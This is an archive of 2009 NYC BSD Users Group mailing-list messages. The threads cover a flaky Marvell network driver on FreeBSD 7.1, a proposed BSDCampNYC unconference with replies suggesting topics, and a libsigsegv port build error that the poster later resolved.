Date: Sun, 29 Mar 2009 06:41:20 -0700 (PDT)
Subject: [nycbug-talk] (no subject)
Message-ID: <144640.88239.qm@web53606.mail.re2.yahoo.com>

Folks,
Is there any help on the horizon regarding the built-in Marvell nic on FreeBSD. The device is going up/down with a variety of configurations.

frodo# grep -iE "msk|phy" /var/run/dmesg.boot
mskc0: port 0xc800-0xc8ff mem 0xfe7fc000-0xfe7fffff irq 18 at device 0.0 on pci2
msk0: on mskc0
msk0: Ethernet address: 00:23:54:82:1d:5a
miibus0: on msk0
e1000phy0: PHY 0 on miibus0
e1000phy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, 1000baseTX-FDX, auto
mskc0: [FILTER]
fwohci0: Phy 1394a available S400, 2 ports.
edit /boot/loader.config with option hw.msk.msi_disable=1 kills the OS and I can't even ssh to the box...

Marvell actually has a freebsd 7.0 driver which I tried from http://www.marvell.com/drivers but this one just aggravated the whole thing to the point of current 7.1 being completely unstable. After all of that I went to http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/dev/msk/... and got the latest if_msk.c and if_mskreg.h, rebuilt the kernel and installed it, and the box went offline after a good start on downloading portsnap.

Now I am getting a four port pci-e card soon but that will be used as part of the NAS device I am building. I wanted to use the built-in interface for administration but I can't get past this driver issue.

Does anyone have any suggestion or possible fix aside from disabling it and getting another cheap adapter.

--sasha

From carton at Ivy.NET Sun Mar 29 11:42:15 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Sun, 29 Mar 2009 11:42:15 -0400
Subject: [nycbug-talk] (no subject)
In-Reply-To: <144640.88239.qm@web53606.mail.re2.yahoo.com> (Aleksandar Kacanski's message of "Sun, 29 Mar 2009 06:41:20 -0700 (PDT)")
References: <144640.88239.qm@web53606.mail.re2.yahoo.com>
Message-ID:

>>>>> "ak" == Aleksandar Kacanski writes:

ak> any suggestion or possible fix aside from disabling it and
ak> getting another cheap adapter.

I heard long ago that openbsd likes the syskonnect adapters (was one of their favorite when it was new) which may be a distant ancestor of the marvell. so you could try switching.

From kacanski_s at yahoo.com Sun Mar 29 13:52:06 2009
From: kacanski_s at yahoo.com (Aleksandar Kacanski)
Date: Sun, 29 Mar 2009 10:52:06 -0700 (PDT)
Subject: [nycbug-talk] Marvell 88E8056 - any working driver for integrated adapter ...
In-Reply-To: <144640.88239.qm@web53606.mail.re2.yahoo.com>
References: <144640.88239.qm@web53606.mail.re2.yahoo.com>
Message-ID: <407289.90491.qm@web53607.mail.re2.yahoo.com>

Hi,
Sorry missed the subject ...
thanks
--sasha

From: Aleksandar Kacanski
To: talk at lists.nycbug.org
Sent: Sunday, March 29, 2009 9:41:20 AM
Subject: [nycbug-talk] (no subject)

Folks,
Is there any help on the horizon regarding the built-in Marvell nic on FreeBSD. The device is going up/down with a variety of configurations.

frodo# grep -iE "msk|phy" /var/run/dmesg.boot
mskc0: port 0xc800-0xc8ff mem 0xfe7fc000-0xfe7fffff irq 18 at device 0.0 on pci2
msk0: on mskc0
msk0: Ethernet address: 00:23:54:82:1d:5a
miibus0: on msk0
e1000phy0: PHY 0 on miibus0
e1000phy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, 1000baseTX-FDX, auto
mskc0: [FILTER]
fwohci0: Phy 1394a available S400, 2 ports.

edit /boot/loader.config with option hw.msk.msi_disable=1 kills the OS and I can't even ssh to the box...

Marvell actually has a freebsd 7.0 driver which I tried from http://www.marvell.com/drivers but this one just aggravated the whole thing to the point of current 7.1 being completely unstable. After all of that I went to http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/dev/msk/... and got the latest if_msk.c and if_mskreg.h, rebuilt the kernel and installed it, and the box went offline after a good start on downloading portsnap.

Now I am getting a four port pci-e card soon but that will be used as part of the NAS device I am building. I wanted to use the built-in interface for administration but I can't get past this driver issue.

Does anyone have any suggestion or possible fix aside from disabling it and getting another cheap adapter.
--sasha
_______________________________________________
talk mailing list
talk at lists.nycbug.org
http://lists.nycbug.org/mailman/listinfo/talk

From skreuzer at exit2shell.com Tue Mar 31 11:32:49 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Tue, 31 Mar 2009 11:32:49 -0400
Subject: [nycbug-talk] BSDCampNYC
Message-ID:

I floated this idea past the folks on the BSD Conference Organizers mailing list and the response was overwhelmingly positive. I wanted to open this idea up to a larger audience to try and gauge people's interest. If enough people like the idea, maybe we can have a larger discussion about it tomorrow after Brian Cully's talk.

To give you a little background, after NYCBSDCon 2008, the NYCBUG admin team got together and kicked around the idea of making the conference biennial for a variety of different reasons. Jason Dixon approached us with the idea of making both NYCBSDCon and DCBSDCon a biennial conference, holding each conference on alternating years. The end result is that year to year there is a BSD conference somewhere on the East Coast.

Due to a variety of reasons, it would be very difficult, if not impossible, to put on a conference in NYC in 2009. To be able to bootstrap the alternating conference schedule would require one of the conferences to be held annually for the first two years.

With all that being said, I would like to start a discussion on what I am calling BSDCampNYC.

Borrowing heavily from BarCamp and CloudCamp, the idea is to hold an interactive, unscripted unconference in NYC related to BSD Unix. There is no set agenda and you can propose your own session or you can attend a session proposed by someone else.

To get an idea of the general interest among the people on this list:

Would you be interested in attending something like this? (If so, are you local to NYC, or would you be traveling?)
Would you be willing to hold a talk, or run a workshop?
What types of things would you be interested in seeing?
--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From brian.gupta at gmail.com Tue Mar 31 12:28:33 2009
From: brian.gupta at gmail.com (Brian Gupta)
Date: Tue, 31 Mar 2009 12:28:33 -0400
Subject: [nycbug-talk] BSDCampNYC
In-Reply-To:
References:
Message-ID: <5b5090780903310928h174c19er574f4b16c62391ab@mail.gmail.com>

Hey I used to be a Boy Scout. Camping is fun.. Don't own a tent though. :(

Seriously, I don't have a lot to offer, but would be happy to attend, schedule permitting of course.

On Tue, Mar 31, 2009 at 11:32 AM, Steven Kreuzer wrote:
> I floated this idea past the folks on the BSD Conference Organizers
> mailing list and the response was overwhelmingly positive.
> I wanted to open this idea up to a larger audience to try and gauge
> people's interest. If enough people like the idea, maybe we
> can have a larger discussion about it tomorrow after Brian Cully's talk
>
> To give you a little background, after NYCBSDCon 2008, the NYCBUG
> admin team got together and kicked around the idea of
> making the conference biennial for a variety of different reasons.
> Jason Dixon approached us with the idea of making both
> NYCBSDCon and DCBSDCon a biennial conference, holding each conference
> on alternating years.
> The end result is that year to year there is a BSD conference
> somewhere on the East Coast.
>
> Due to a variety of reasons, it would be very difficult, if not
> impossible to put on a conference in NYC in 2009. To be able
> to bootstrap the alternating conference schedule would require one of
> the conferences to be held annually for the
> first two years.
>
> With all that being said, I would like to start a discussion on what I
> am calling BSDCampNYC.
>
> Borrowing heavily from BarCamp and CloudCamp, the idea is to hold an
> interactive, unscripted unconference in NYC
> related to BSD Unix. There is no set agenda and you can propose your
> own session or you can
> attend a session proposed by someone else.
>
> To get an idea of the general interest among the people on this list:
>
> Would you be interested in attending something like this? (If so, are
> you local to NYC, or would you be traveling?)
> Would you be willing to hold a talk, or run a workshop?
> What types of things would you be interested in seeing?
>
> --
> Steven Kreuzer
> http://www.exit2shell.com/~skreuzer
> _______________________________________________
> talk mailing list
> talk at lists.nycbug.org
> http://lists.nycbug.org/mailman/listinfo/talk
>

--
- Brian Gupta

New York City user groups calendar:
http://nyc.brandorr.com/

From lego at therac25.net Tue Mar 31 13:07:25 2009
From: lego at therac25.net (Andy Michaels)
Date: Tue, 31 Mar 2009 13:07:25 -0400
Subject: [nycbug-talk] BSDCampNYC
In-Reply-To:
References:
Message-ID: <47f344f40903311007s6ffb3c4dyfe0e3b9e8e1d400b@mail.gmail.com>

> Would you be interested in attending something like this? (If so, are
> you local to NYC, or would you be traveling?)

Interested and local (NJ)

> Would you be willing to hold a talk, or run a workshop?

Like Brian, probably not much to offer, but I could sure talk about some beginner stuff

> What types of things would you be interested in seeing?

- embedded
- storage
- *BSD roadmaps
- new/underrated features
- interesting uses of *BSD

From lists at zaunere.com Tue Mar 31 13:14:25 2009
From: lists at zaunere.com (Hans Zaunere)
Date: Tue, 31 Mar 2009 13:14:25 -0400
Subject: [nycbug-talk] BSDCampNYC
In-Reply-To:
References:
Message-ID: <02d501c9b224$25141650$6f3c42f0$@com>

> To get an idea of the general interest among the people on this list:
>
> Would you be interested in attending something like this? (If so, are
> you local to NYC, or would you be traveling?)

Yes, local

> Would you be willing to hold a talk, or run a workshop?

Sure, as long as I'm behind chicken wire.

> What types of things would you be interested in seeing?

How BSDCampNYC would differentiate itself (or not) from being an uber NYCBUG meeting.
Then perhaps other groups would do something similar.

H

From max at neuropunks.org Tue Mar 31 13:33:33 2009
From: max at neuropunks.org (Max Gribov)
Date: Tue, 31 Mar 2009 13:33:33 -0400
Subject: [nycbug-talk] BSDCampNYC
In-Reply-To:
References:
Message-ID: <49D253ED.7020900@neuropunks.org>

Steven Kreuzer wrote:
> What types of things would you be interested in seeing?
>
>

i think large scale isp style deployments using bsd would be cool, specifically using bsd as border routers with openbgpd and some sort of HA setup vs commercial vendors or something similar.
also, success stories of migration from linux to bsd maybe?

> --
> Steven Kreuzer
> http://www.exit2shell.com/~skreuzer
> _______________________________________________
> talk mailing list
> talk at lists.nycbug.org
> http://lists.nycbug.org/mailman/listinfo/talk
>

From kacanski_s at yahoo.com Tue Mar 31 17:09:21 2009
From: kacanski_s at yahoo.com (Aleksandar Kacanski)
Date: Tue, 31 Mar 2009 14:09:21 -0700 (PDT)
Subject: [nycbug-talk] Linux emulation compile error for libsigsegv
In-Reply-To: <49D253ED.7020900@neuropunks.org>
References: <49D253ED.7020900@neuropunks.org>
Message-ID: <425358.38101.qm@web53608.mail.re2.yahoo.com>

Hi,
Anyone have an idea why this port is failing on 7.1 for libsigsegv. I just ran cvsup and got a couple of ports installed ... Am I missing something here...
--sasha

...
make TARGETSTACK=" all" all-recursive
Making all in src
/bin/sh /usr/local/bin/libtool --tag=CC --mode=compile cc -DHAVE_CONFIG_H -I. -I.. -I. -I. -O2 -fno-strict-aliasing -pipe -c -o handler.lo handler.c
cc -DHAVE_CONFIG_H -I. -I.. -I. -I. -O2 -fno-strict-aliasing -pipe -c handler.c -fPIC -DPIC -o .libs/handler.o
In file included from handler.c:20:
handler-unix.c: In function 'sigsegv_handler':
handler-unix.c:147: error: 'struct sigcontext' has no member named 'sc_esp'
*** Error code 1

Stop in /usr/ports/devel/libsigsegv/work/libsigsegv-2.5/src.
*** Error code 1
...
Stop in /usr/ports/devel/m4.
*** Error code 1

Stop in /usr/ports/devel/autoconf262.
*** Error code 1

Stop in /usr/ports/devel/automake14.
*** Error code 1

Stop in /usr/ports/archivers/rpm.
*** Error code 1

Stop in /usr/ports/emulators/linux_base-fc4.

Thanks,
--sasha

From kacanski_s at yahoo.com Tue Mar 31 19:41:51 2009
From: kacanski_s at yahoo.com (Aleksandar Kacanski)
Date: Tue, 31 Mar 2009 16:41:51 -0700 (PDT)
Subject: [nycbug-talk] Linux emulation compile error for libsigsegv
In-Reply-To: <425358.38101.qm@web53608.mail.re2.yahoo.com>
References: <49D253ED.7020900@neuropunks.org> <425358.38101.qm@web53608.mail.re2.yahoo.com>
Message-ID: <535082.58131.qm@web53604.mail.re2.yahoo.com>

Hi,
Anyone have an idea why this port is failing on 7.1 for libsigsegv. I just ran cvsup and got a couple of ports installed ... Am I missing something here...
--sasha

...
make TARGETSTACK=" all" all-recursive
Making all in src
/bin/sh /usr/local/bin/libtool --tag=CC --mode=compile cc -DHAVE_CONFIG_H -I. -I.. -I. -I. -O2 -fno-strict-aliasing -pipe -c -o handler.lo handler.c
cc -DHAVE_CONFIG_H -I. -I.. -I. -I. -O2 -fno-strict-aliasing -pipe -c handler.c -fPIC -DPIC -o .libs/handler.o
In file included from handler.c:20:
handler-unix.c: In function 'sigsegv_handler':
handler-unix.c:147: error: 'struct sigcontext' has no member named 'sc_esp'
*** Error code 1

Stop in /usr/ports/devel/libsigsegv/work/libsigsegv-2.5/src.
*** Error code 1
...
Stop in /usr/ports/devel/m4.
*** Error code 1

Stop in /usr/ports/devel/autoconf262.
*** Error code 1

Stop in /usr/ports/devel/automake14.
*** Error code 1

Stop in /usr/ports/archivers/rpm.
*** Error code 1

Stop in /usr/ports/emulators/linux_base-fc4.

Thanks,
--sasha

---------------------------------------------------------------
It was an optional library and I selected it blindly compiling /usr/ports/devel/m4
fixed now ...
sorry for the post ...
--sasha